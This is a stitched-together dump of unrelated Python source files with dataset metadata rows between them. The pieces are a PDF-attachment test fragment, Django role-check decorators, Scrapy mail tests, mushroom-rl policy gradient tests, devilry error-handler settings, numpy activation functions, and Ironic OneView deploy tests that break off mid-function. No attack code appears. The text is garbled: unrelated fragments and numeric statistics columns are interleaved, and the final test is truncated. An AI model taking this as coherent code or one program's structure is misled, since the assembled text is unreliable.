def test_2pdfs_oneexists(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content")
filename2 = self.attachPDF("Some More PDF content")
self.assertFalse(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertFalse(os.path.exists(os.path.join(self.workingDir, filename2)))
self.touch(os.path.join(self.workingDir, filename))
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
rootName, unused_extension = os.path.splitext(filename)
uniqueName = rootName + "_1.pdf"
self.assertTrue(os.path.exists(os.path.join(self.workingDir, uniqueName)))
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename2)))
rootName2, unused_extension2 = os.path.splitext(filename2)
uniqueName2 = rootName2 + "_1.pdf"
self.assertFalse(os.path.exists(os.path.join(self.workingDir, uniqueName2)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertIsNone(self.getPDFText(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, uniqueName)), "Some PDF content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename2)), "Some More PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
| 49.383285
| 124
| 0.664041
| 1,820
| 17,136
| 6.207143
| 0.113187
| 0.040896
| 0.080729
| 0.049571
| 0.854829
| 0.82606
| 0.806763
| 0.804815
| 0.790741
| 0.769939
| 0
| 0.00901
| 0.203373
| 17,136
| 346
| 125
| 49.526012
| 0.818255
| 0
| 0
| 0.720257
| 0
| 0.003215
| 0.10866
| 0.031104
| 0
| 0
| 0
| 0
| 0.543408
| 1
| 0.07717
| false
| 0
| 0.016077
| 0
| 0.096463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5d62e631a79c45d3da50aa99d1a28f3c6b87bc14
| 1,418
|
py
|
Python
|
accounts/decorators.py
|
qinyanjuidavid/Raki
|
2bca3e6a6f410619c699be8c45cd2cad8aa08e0c
|
[
"MIT"
] | null | null | null |
accounts/decorators.py
|
qinyanjuidavid/Raki
|
2bca3e6a6f410619c699be8c45cd2cad8aa08e0c
|
[
"MIT"
] | null | null | null |
accounts/decorators.py
|
qinyanjuidavid/Raki
|
2bca3e6a6f410619c699be8c45cd2cad8aa08e0c
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import user_passes_test
def administrator_required(function=None,
redirect_field_name=REDIRECT_FIELD_NAME,
login_url="/accounts/login/"):
actual_decorator = user_passes_test(
lambda u: u.is_active and u.role == "Administrator" or u.is_admin == True,
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
def customer_required(function=None,
redirect_field_name=REDIRECT_FIELD_NAME,
login_url="/accounts/login/"):
actual_decorator = user_passes_test(
lambda u: u.is_active and u.role == "Customer",
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
def dealer_required(function=None,
redirect_field_name=REDIRECT_FIELD_NAME,
login_url="/accounts/login/"):
actual_decorator = user_passes_test(
lambda u: u.is_active and u.role == "Dealer",
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
| 29.541667
| 82
| 0.666432
| 166
| 1,418
| 5.337349
| 0.210843
| 0.190745
| 0.249436
| 0.1693
| 0.812641
| 0.812641
| 0.812641
| 0.812641
| 0.812641
| 0.812641
| 0
| 0
| 0.264457
| 1,418
| 47
| 83
| 30.170213
| 0.849473
| 0
| 0
| 0.685714
| 0
| 0
| 0.052891
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085714
| false
| 0.114286
| 0.057143
| 0
| 0.314286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
53dbc06869472920c14e0052ed4fc609a8294557
| 4,764
|
py
|
Python
|
tests/test_mail.py
|
wahello/scrapy
|
b82a480e91ba3fb43b8c75f1e70d204919105e4b
|
[
"BSD-3-Clause"
] | 3
|
2020-08-06T04:59:26.000Z
|
2020-08-19T01:22:39.000Z
|
tests/test_mail.py
|
wahello/scrapy
|
b82a480e91ba3fb43b8c75f1e70d204919105e4b
|
[
"BSD-3-Clause"
] | 4
|
2020-06-06T03:16:43.000Z
|
2020-07-27T16:43:50.000Z
|
tests/test_mail.py
|
wahello/scrapy
|
b82a480e91ba3fb43b8c75f1e70d204919105e4b
|
[
"BSD-3-Clause"
] | null | null | null |
# coding=utf-8
import unittest
from io import BytesIO
from email.charset import Charset
from scrapy.mail import MailSender
class MailSenderTest(unittest.TestCase):
def test_send(self):
mailsender = MailSender(debug=True)
mailsender.send(to=['test@scrapy.org'], subject='subject', body='body',
_callback=self._catch_mail_sent)
assert self.catched_msg
self.assertEqual(self.catched_msg['to'], ['test@scrapy.org'])
self.assertEqual(self.catched_msg['subject'], 'subject')
self.assertEqual(self.catched_msg['body'], 'body')
msg = self.catched_msg['msg']
self.assertEqual(msg['to'], 'test@scrapy.org')
self.assertEqual(msg['subject'], 'subject')
self.assertEqual(msg.get_payload(), 'body')
self.assertEqual(msg.get('Content-Type'), 'text/plain')
def test_send_single_values_to_and_cc(self):
mailsender = MailSender(debug=True)
mailsender.send(to='test@scrapy.org', subject='subject', body='body',
cc='test@scrapy.org', _callback=self._catch_mail_sent)
def test_send_html(self):
mailsender = MailSender(debug=True)
mailsender.send(to=['test@scrapy.org'], subject='subject',
body='<p>body</p>', mimetype='text/html',
_callback=self._catch_mail_sent)
msg = self.catched_msg['msg']
self.assertEqual(msg.get_payload(), '<p>body</p>')
self.assertEqual(msg.get('Content-Type'), 'text/html')
def test_send_attach(self):
attach = BytesIO()
attach.write(b'content')
attach.seek(0)
attachs = [('attachment', 'text/plain', attach)]
mailsender = MailSender(debug=True)
mailsender.send(to=['test@scrapy.org'], subject='subject', body='body',
attachs=attachs, _callback=self._catch_mail_sent)
assert self.catched_msg
self.assertEqual(self.catched_msg['to'], ['test@scrapy.org'])
self.assertEqual(self.catched_msg['subject'], 'subject')
self.assertEqual(self.catched_msg['body'], 'body')
msg = self.catched_msg['msg']
self.assertEqual(msg['to'], 'test@scrapy.org')
self.assertEqual(msg['subject'], 'subject')
payload = msg.get_payload()
assert isinstance(payload, list)
self.assertEqual(len(payload), 2)
text, attach = payload
self.assertEqual(text.get_payload(decode=True), b'body')
self.assertEqual(text.get_charset(), Charset('us-ascii'))
self.assertEqual(attach.get_payload(decode=True), b'content')
def _catch_mail_sent(self, **kwargs):
self.catched_msg = dict(**kwargs)
def test_send_utf8(self):
subject = u'sübjèçt'
body = u'bödÿ-àéïöñß'
mailsender = MailSender(debug=True)
mailsender.send(to=['test@scrapy.org'], subject=subject, body=body,
charset='utf-8', _callback=self._catch_mail_sent)
assert self.catched_msg
self.assertEqual(self.catched_msg['subject'], subject)
self.assertEqual(self.catched_msg['body'], body)
msg = self.catched_msg['msg']
self.assertEqual(msg['subject'], subject)
self.assertEqual(msg.get_payload(), body)
self.assertEqual(msg.get_charset(), Charset('utf-8'))
self.assertEqual(msg.get('Content-Type'), 'text/plain; charset="utf-8"')
def test_send_attach_utf8(self):
subject = u'sübjèçt'
body = u'bödÿ-àéïöñß'
attach = BytesIO()
attach.write(body.encode('utf-8'))
attach.seek(0)
attachs = [('attachment', 'text/plain', attach)]
mailsender = MailSender(debug=True)
mailsender.send(to=['test@scrapy.org'], subject=subject, body=body,
attachs=attachs, charset='utf-8',
_callback=self._catch_mail_sent)
assert self.catched_msg
self.assertEqual(self.catched_msg['subject'], subject)
self.assertEqual(self.catched_msg['body'], body)
msg = self.catched_msg['msg']
self.assertEqual(msg['subject'], subject)
self.assertEqual(msg.get_charset(), Charset('utf-8'))
self.assertEqual(msg.get('Content-Type'),
'multipart/mixed; charset="utf-8"')
payload = msg.get_payload()
assert isinstance(payload, list)
self.assertEqual(len(payload), 2)
text, attach = payload
self.assertEqual(text.get_payload(decode=True).decode('utf-8'), body)
self.assertEqual(text.get_charset(), Charset('utf-8'))
self.assertEqual(attach.get_payload(decode=True).decode('utf-8'), body)
if __name__ == "__main__":
unittest.main()
| 37.511811
| 80
| 0.622796
| 561
| 4,764
| 5.139037
| 0.130125
| 0.171696
| 0.097121
| 0.052029
| 0.83316
| 0.811655
| 0.811655
| 0.749913
| 0.710024
| 0.683663
| 0
| 0.004632
| 0.229639
| 4,764
| 126
| 81
| 37.809524
| 0.780926
| 0.002519
| 0
| 0.604167
| 0
| 0
| 0.136211
| 0
| 0
| 0
| 0
| 0
| 0.40625
| 1
| 0.072917
| false
| 0
| 0.041667
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9908d8f4e303c64626cf0b77116a7563242ee69c
| 51
|
py
|
Python
|
examples/one/rule_4.py
|
ayushpallav/anthill
|
740b8fce4281dfc4ca587c21a2d37741c649d870
|
[
"MIT"
] | 14
|
2020-05-22T20:57:29.000Z
|
2021-08-19T14:56:32.000Z
|
examples/one/rule_4.py
|
ayushpallav/apple-pie
|
740b8fce4281dfc4ca587c21a2d37741c649d870
|
[
"MIT"
] | 2
|
2021-01-04T05:05:08.000Z
|
2021-01-04T05:11:08.000Z
|
examples/one/rule_4.py
|
ayushpallav/apple-pie
|
740b8fce4281dfc4ca587c21a2d37741c649d870
|
[
"MIT"
] | null | null | null |
print("-----------------rule_4------------------")
| 25.5
| 50
| 0.215686
| 3
| 51
| 3.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02
| 0.019608
| 51
| 1
| 51
| 51
| 0.18
| 0
| 0
| 0
| 0
| 0
| 0.803922
| 0.803922
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
54e0b539feade859123bfe6c4d6a679e4f52ceeb
| 4,166
|
py
|
Python
|
tests/policy/test_gaussian_policy.py
|
PuzeLiu/mushroom-rl
|
99942b425e66b4ddcc26009d7105dde23841e95d
|
[
"MIT"
] | 344
|
2020-01-10T09:45:02.000Z
|
2022-03-30T09:48:28.000Z
|
tests/policy/test_gaussian_policy.py
|
AmmarFahmy/mushroom-rl
|
2625ee7f64d5613b3b9fba00f0b7a39fece88ca5
|
[
"MIT"
] | 44
|
2020-01-23T03:00:56.000Z
|
2022-03-25T17:14:22.000Z
|
tests/policy/test_gaussian_policy.py
|
AmmarFahmy/mushroom-rl
|
2625ee7f64d5613b3b9fba00f0b7a39fece88ca5
|
[
"MIT"
] | 93
|
2020-01-10T21:17:58.000Z
|
2022-03-31T17:58:52.000Z
|
from mushroom_rl.policy.gaussian_policy import *
from mushroom_rl.approximators.regressor import Regressor
from mushroom_rl.approximators.parametric import LinearApproximator
from mushroom_rl.utils.numerical_gradient import numerical_diff_policy
def test_univariate_gaussian():
np.random.seed(88)
sigma = 1e-3 * np.eye(1)
n_dims = 5
approximator = Regressor(LinearApproximator,
input_shape=(n_dims,),
output_shape=(1,))
pi = GaussianPolicy(approximator, sigma)
mu_weights = np.random.rand(pi.weights_size)
pi.set_weights(mu_weights)
x = np.random.randn(20, n_dims)
for x_i in x:
state = np.atleast_1d(x_i)
action = pi.draw_action(state)
exact_diff = pi.diff(state, action)
numerical_diff = numerical_diff_policy(pi, state, action)
assert np.allclose(exact_diff, numerical_diff)
def test_multivariate_gaussian():
np.random.seed(88)
n_dims = 5
n_outs = 3
random_matrix = np.random.rand(n_outs, n_outs)
sigma = random_matrix.dot(random_matrix.T)
approximator = Regressor(LinearApproximator,
input_shape=(n_dims,),
output_shape=(n_outs,))
pi = GaussianPolicy(approximator, sigma)
mu_weights = np.random.rand(pi.weights_size)
pi.set_weights(mu_weights)
x = np.random.randn(20, n_dims)
for x_i in x:
state = np.atleast_1d(x_i)
action = pi.draw_action(state)
exact_diff = pi.diff(state, action)
numerical_diff = numerical_diff_policy(pi, state, action)
assert np.allclose(exact_diff, numerical_diff)
def test_multivariate_diagonal_gaussian():
np.random.seed(88)
n_dims = 5
n_outs = 3
std = np.random.randn(n_outs)
approximator = Regressor(LinearApproximator,
input_shape=(n_dims,),
output_shape=(n_outs,))
pi = DiagonalGaussianPolicy(approximator, std)
mu_weights = np.random.rand(pi.weights_size)
pi.set_weights(mu_weights)
x = np.random.randn(20, n_dims)
for x_i in x:
state = np.atleast_1d(x_i)
action = pi.draw_action(state)
exact_diff = pi.diff(state, action)
numerical_diff = numerical_diff_policy(pi, state, action)
assert np.allclose(exact_diff, numerical_diff)
def test_multivariate_state_std_gaussian():
np.random.seed(88)
n_dims = 5
n_outs = 3
mu_approximator = Regressor(LinearApproximator,
input_shape=(n_dims,),
output_shape=(n_outs,))
std_approximator = Regressor(LinearApproximator,
input_shape=(n_dims,),
output_shape=(n_outs,))
pi = StateStdGaussianPolicy(mu_approximator, std_approximator)
weights = np.random.rand(pi.weights_size) + .1
pi.set_weights(weights)
x = np.random.randn(20, n_dims)
for x_i in x:
state = np.atleast_1d(x_i)
action = pi.draw_action(state)
exact_diff = pi.diff(state, action)
numerical_diff = numerical_diff_policy(pi, state, action)
assert np.allclose(exact_diff, numerical_diff)
def test_multivariate_state_log_std_gaussian():
np.random.seed(88)
n_dims = 5
n_outs = 3
mu_approximator = Regressor(LinearApproximator,
input_shape=(n_dims,),
output_shape=(n_outs,))
log_var_approximator = Regressor(LinearApproximator,
input_shape=(n_dims,),
output_shape=(n_outs,))
pi = StateLogStdGaussianPolicy(mu_approximator, log_var_approximator)
weights = np.random.rand(pi.weights_size)
pi.set_weights(weights)
x = np.random.randn(20, n_dims)
for x_i in x:
state = np.atleast_1d(x_i)
action = pi.draw_action(state)
exact_diff = pi.diff(state, action)
numerical_diff = numerical_diff_policy(pi, state, action)
assert np.allclose(exact_diff, numerical_diff)
| 29.757143
| 73
| 0.630101
| 520
| 4,166
| 4.765385
| 0.126923
| 0.054883
| 0.068604
| 0.124294
| 0.805892
| 0.797014
| 0.797014
| 0.797014
| 0.774415
| 0.748184
| 0
| 0.012987
| 0.279165
| 4,166
| 139
| 74
| 29.971223
| 0.812188
| 0
| 0
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05102
| 1
| 0.05102
| false
| 0
| 0.040816
| 0
| 0.091837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54e66c562a6c9478f9370ccb2f800e12b0084108
| 141
|
py
|
Python
|
devilry/project/common/http_error_handlers.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 29
|
2015-01-18T22:56:23.000Z
|
2020-11-10T21:28:27.000Z
|
devilry/project/common/http_error_handlers.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 786
|
2015-01-06T16:10:18.000Z
|
2022-03-16T11:10:50.000Z
|
devilry/project/common/http_error_handlers.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 15
|
2015-04-06T06:18:43.000Z
|
2021-02-24T12:28:30.000Z
|
handler404 = 'devilry.devilry_errortemplates.views.custom_404_handler'
handler500 = 'devilry.devilry_errortemplates.views.custom_500_handler'
| 70.5
| 70
| 0.879433
| 16
| 141
| 7.375
| 0.5625
| 0.237288
| 0.474576
| 0.559322
| 0.661017
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 0.035461
| 141
| 2
| 71
| 70.5
| 0.779412
| 0
| 0
| 0
| 0
| 0
| 0.774648
| 0.774648
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db62351278c9a45ad5a2e829f0a11da9b4944222
| 3,295
|
py
|
Python
|
glosysnet/nn/activate/activate.py
|
NareshAtnPLUS/glosysnet
|
e85df44727b8784766be7e728267e5699997e226
|
[
"MIT"
] | null | null | null |
glosysnet/nn/activate/activate.py
|
NareshAtnPLUS/glosysnet
|
e85df44727b8784766be7e728267e5699997e226
|
[
"MIT"
] | null | null | null |
glosysnet/nn/activate/activate.py
|
NareshAtnPLUS/glosysnet
|
e85df44727b8784766be7e728267e5699997e226
|
[
"MIT"
] | null | null | null |
import numpy as np
def sigmoid(x, derivative=False):
if (derivative == True):
return x * (1 - x)# Derivative Equation
return 1 / (1 + np.exp(-x))
def tanh(x, derivative=False):
if (derivative == True):
return (1 - np.square(np.tanh(x)))# Derivative Equation
return np.tanh(x)
def relu(x, derivative=False):
if (derivative == True):# Derivative Equation
for i in range(0, len(x)):
for k in range(len(x[i])):
if x[i][k] > 0:
x[i][k] = 1
else:
x[i][k] = 0
return x
for i in range(0, len(x)):
for k in range(0, len(x[i])):
if x[i][k] > 0:
pass # do nothing since it would be effectively replacing x with x
else:
x[i][k] = 0
return x
def arctan(x, derivative=False):
if (derivative == True):
return (np.cos(x) ** 2)
return np.arctan(x)
def step(x, derivative=False):
if (derivative == True):
for i in range(0, len(x)):
for k in range(len(x[i])):
if x[i][k] > 0:
x[i][k] = 0
return x
for i in range(0, len(x)):
for k in range(0, len(x[i])):
if x[i][k] > 0:
x[i][k] = 1
else:
x[i][k] = 0
return x
def squash(x, derivative=False):
if (derivative == True):
for i in range(0, len(x)):
for k in range(0, len(x[i])):
if x[i][k] > 0:
x[i][k] = (x[i][k]) / (1 + x[i][k])
else:
x[i][k] = (x[i][k]) / (1 - x[i][k])
return x
for i in range(0, len(x)):
for k in range(0, len(x[i])):
x[i][k] = (x[i][k]) / (1 + abs(x[i][k]))
return x
def gaussian(x, derivative=False):
if (derivative == True):
for i in range(0, len(x)):
for k in range(0, len(x[i])):
x[i][k] = -2* x[i][k] * np.exp(-x[i][k] ** 2)
for i in range(0, len(x)):
for k in range(0, len(x[i])):
x[i][k] = np.exp(-x[i][k] ** 2)
return x
def leaky_relu(x, derivative=False):
alpha = 0.1
if (derivative == True):
for i in range(0, len(x)):
for k in range(len(x[i])):
if x[i][k] >= alpha*x[i][k]:
x[i][k] = 1
else:
x[i][k] = alpha
return x
for i in range(0, len(x)):
for k in range(0, len(x[i])):
if x[i][k] >= alpha*x[i][k]:
pass # do nothing since it would be effectively replacing x with x
else:
x[i][k] = alpha*x[i][k]
return x
def elu(x, derivative=False):
alpha = 0.1
if (derivative == True):
for i in range(0, len(x)):
for k in range(len(x[i])):
if x[i][k] > 0:
x[i][k] = 1
else:
x[i][k] = alpha*np.exp(x[i][k])
return x
for i in range(0, len(x)):
for k in range(0, len(x[i])):
if x[i][k] > 0:
pass # do nothing since it would be effectively replacing x with x
else:
x[i][k] = alpha*(np.exp(x[i][k]) - 1)
return x
| 30.229358
| 83
| 0.427618
| 527
| 3,295
| 2.671727
| 0.087287
| 0.073864
| 0.085227
| 0.15625
| 0.839489
| 0.839489
| 0.800426
| 0.714489
| 0.704545
| 0.678267
| 0
| 0.026007
| 0.404856
| 3,295
| 109
| 84
| 30.229358
| 0.691994
| 0.073141
| 0
| 0.747475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0.030303
| 0.010101
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db9098f2b064b71de95efeb1e67b324c9678fe4d
| 44,034
|
py
|
Python
|
ironic/tests/unit/drivers/modules/oneview/test_deploy.py
|
mail2nsrajesh/ironic
|
ff4be0cd4044a634a8ad04ad50bc97fa625b3305
|
[
"Apache-2.0"
] | null | null | null |
ironic/tests/unit/drivers/modules/oneview/test_deploy.py
|
mail2nsrajesh/ironic
|
ff4be0cd4044a634a8ad04ad50bc97fa625b3305
|
[
"Apache-2.0"
] | null | null | null |
ironic/tests/unit/drivers/modules/oneview/test_deploy.py
|
mail2nsrajesh/ironic
|
ff4be0cd4044a634a8ad04ad50bc97fa625b3305
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Hewlett Packard Enterprise Development LP.
# Copyright 2016 Universidade Federal de Campina Grande
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import time
import types
from oslo_utils import importutils
from ironic.common import driver_factory
from ironic.common import exception
from ironic.common import states
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.conf import CONF
from ironic.drivers.modules import agent
from ironic.drivers.modules import agent_client
from ironic.drivers.modules import iscsi_deploy
from ironic.drivers.modules.oneview import common
from ironic.drivers.modules.oneview import deploy
from ironic.drivers.modules.oneview import deploy_utils
from ironic.drivers.modules.oneview import power
from ironic.drivers.modules import pxe
from ironic.drivers import utils as driver_utils
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as obj_utils
oneview_models = importutils.try_import('oneview_client.models')
METHODS = ['iter_nodes', 'update_node', 'do_provisioning_action']
PXE_DRV_INFO_DICT = db_utils.get_test_pxe_driver_info()
PXE_INST_INFO_DICT = db_utils.get_test_pxe_instance_info()
oneview_error = common.SERVER_HARDWARE_ALLOCATION_ERROR
maintenance_reason = common.NODE_IN_USE_BY_ONEVIEW
driver_internal_info = {'oneview_error': oneview_error}
nodes_taken_by_oneview = [(1, 'fake_oneview')]
nodes_freed_by_oneview = [(1, 'fake_oneview', maintenance_reason)]
nodes_taken_on_cleanfail = [(1, 'fake_oneview', driver_internal_info)]
nodes_taken_on_cleanfail_no_info = [(1, 'fake_oneview', {})]
GET_POWER_STATE_RETRIES = 5
def _setup_node_in_available_state(node):
node.provision_state = states.AVAILABLE
node.maintenance = False
node.maintenance_reason = None
node.save()
def _setup_node_in_manageable_state(node):
node.provision_state = states.MANAGEABLE
node.maintenance = True
node.maintenance_reason = common.NODE_IN_USE_BY_ONEVIEW
node.save()
def _setup_node_in_cleanfailed_state_with_oneview_error(node):
node.provision_state = states.CLEANFAIL
node.maintenance = False
node.maintenance_reason = None
driver_internal_info = node.driver_internal_info
oneview_error = common.SERVER_HARDWARE_ALLOCATION_ERROR
driver_internal_info['oneview_error'] = oneview_error
node.driver_internal_info = driver_internal_info
node.save()
def _setup_node_in_cleanfailed_state_without_oneview_error(node):
node.provision_state = states.CLEANFAIL
node.maintenance = False
node.maintenance_reason = None
node.save()
class OneViewDriverDeploy(deploy.OneViewPeriodicTasks):
oneview_driver = 'fake_oneview'
def __init__(self):
self.oneview_client = mock.MagicMock()
@mock.patch('ironic.objects.Node', spec_set=True, autospec=True)
@mock.patch.object(deploy_utils, 'is_node_in_use_by_oneview')
class OneViewPeriodicTasks(db_base.DbTestCase):
def setUp(self):
super(OneViewPeriodicTasks, self).setUp()
self.config(manager_url='https://1.2.3.4', group='oneview')
self.config(username='user', group='oneview')
self.config(password='password', group='oneview')
mgr_utils.mock_the_extension_manager(driver='fake_oneview')
self.driver = driver_factory.get_driver('fake_oneview')
self.deploy = OneViewDriverDeploy()
self.manager = mock.MagicMock(spec=METHODS)
self.node = obj_utils.create_test_node(
self.context, driver='fake_oneview',
properties=db_utils.get_test_oneview_properties(),
driver_info=db_utils.get_test_oneview_driver_info(),
)
def test_node_manageable_maintenance_when_in_use_by_oneview(
self, mock_is_node_in_use_by_oneview, mock_node_get
):
mock_node_get.get.return_value = self.node
_setup_node_in_available_state(self.node)
self.manager.iter_nodes.return_value = nodes_taken_by_oneview
mock_is_node_in_use_by_oneview.return_value = True
self.deploy._periodic_check_nodes_taken_by_oneview(
self.manager, self.context
)
mock_is_node_in_use_by_oneview.assert_called_once_with(
self.deploy.oneview_client, self.node
)
self.assertTrue(self.manager.update_node.called)
self.assertTrue(self.manager.do_provisioning_action.called)
self.assertTrue(self.node.maintenance)
self.assertEqual(common.NODE_IN_USE_BY_ONEVIEW,
self.node.maintenance_reason)
def test_node_stay_available_when_not_in_use_by_oneview(
self, mock_is_node_in_use_by_oneview, mock_node_get
):
mock_node_get.get.return_value = self.node
_setup_node_in_available_state(self.node)
mock_node_get.return_value = self.node
mock_is_node_in_use_by_oneview.return_value = False
self.manager.iter_nodes.return_value = nodes_taken_by_oneview
self.deploy._periodic_check_nodes_taken_by_oneview(
self.manager, self.context
)
mock_is_node_in_use_by_oneview.assert_called_once_with(
self.deploy.oneview_client, self.node
)
self.assertFalse(self.manager.update_node.called)
self.assertFalse(self.manager.do_provisioning_action.called)
self.assertFalse(self.node.maintenance)
self.assertIsNone(self.node.maintenance_reason)
def test_node_stay_available_when_raise_exception(
self, mock_is_node_in_use_by_oneview, mock_node_get
):
mock_node_get.get.return_value = self.node
_setup_node_in_available_state(self.node)
side_effect = exception.OneViewError('boom')
mock_is_node_in_use_by_oneview.side_effect = side_effect
self.manager.iter_nodes.return_value = nodes_taken_by_oneview
self.deploy._periodic_check_nodes_taken_by_oneview(
self.manager, self.context
)
mock_is_node_in_use_by_oneview.assert_called_once_with(
self.deploy.oneview_client, self.node
)
self.assertFalse(self.manager.update_node.called)
self.assertFalse(self.manager.do_provisioning_action.called)
self.assertFalse(self.node.maintenance)
self.assertNotEqual(common.NODE_IN_USE_BY_ONEVIEW,
self.node.maintenance_reason)
def test_node_available_when_not_in_use_by_oneview(
self, mock_is_node_in_use_by_oneview, mock_node_get
):
mock_node_get.get.return_value = self.node
_setup_node_in_manageable_state(self.node)
self.manager.iter_nodes.return_value = nodes_freed_by_oneview
mock_is_node_in_use_by_oneview.return_value = False
self.deploy._periodic_check_nodes_freed_by_oneview(
self.manager, self.context
)
mock_is_node_in_use_by_oneview.assert_called_once_with(
self.deploy.oneview_client, self.node
)
self.assertTrue(self.manager.update_node.called)
self.assertTrue(self.manager.do_provisioning_action.called)
self.assertFalse(self.node.maintenance)
self.assertIsNone(self.node.maintenance_reason)
def test_node_stay_manageable_when_in_use_by_oneview(
self, mock_is_node_in_use_by_oneview, mock_node_get
):
mock_node_get.get.return_value = self.node
_setup_node_in_manageable_state(self.node)
mock_is_node_in_use_by_oneview.return_value = True
self.manager.iter_nodes.return_value = nodes_freed_by_oneview
self.deploy._periodic_check_nodes_freed_by_oneview(
self.manager, self.context
)
mock_is_node_in_use_by_oneview.assert_called_once_with(
self.deploy.oneview_client, self.node
)
self.assertFalse(self.manager.update_node.called)
self.assertFalse(self.manager.do_provisioning_action.called)
self.assertTrue(self.node.maintenance)
self.assertEqual(common.NODE_IN_USE_BY_ONEVIEW,
self.node.maintenance_reason)
def test_node_stay_manageable_maintenance_when_raise_exception(
self, mock_is_node_in_use_by_oneview, mock_node_get
):
mock_node_get.get.return_value = self.node
_setup_node_in_manageable_state(self.node)
side_effect = exception.OneViewError('boom')
mock_is_node_in_use_by_oneview.side_effect = side_effect
self.manager.iter_nodes.return_value = nodes_freed_by_oneview
self.deploy._periodic_check_nodes_freed_by_oneview(
self.manager, self.context
)
mock_is_node_in_use_by_oneview.assert_called_once_with(
self.deploy.oneview_client, self.node
)
self.assertFalse(self.manager.update_node.called)
self.assertFalse(self.manager.do_provisioning_action.called)
self.assertTrue(self.node.maintenance)
self.assertEqual(common.NODE_IN_USE_BY_ONEVIEW,
self.node.maintenance_reason)
def test_node_manageable_maintenance_when_oneview_error(
self, mock_is_node_in_use_by_oneview, mock_node_get
):
mock_node_get.get.return_value = self.node
_setup_node_in_cleanfailed_state_with_oneview_error(self.node)
self.manager.iter_nodes.return_value = nodes_taken_on_cleanfail
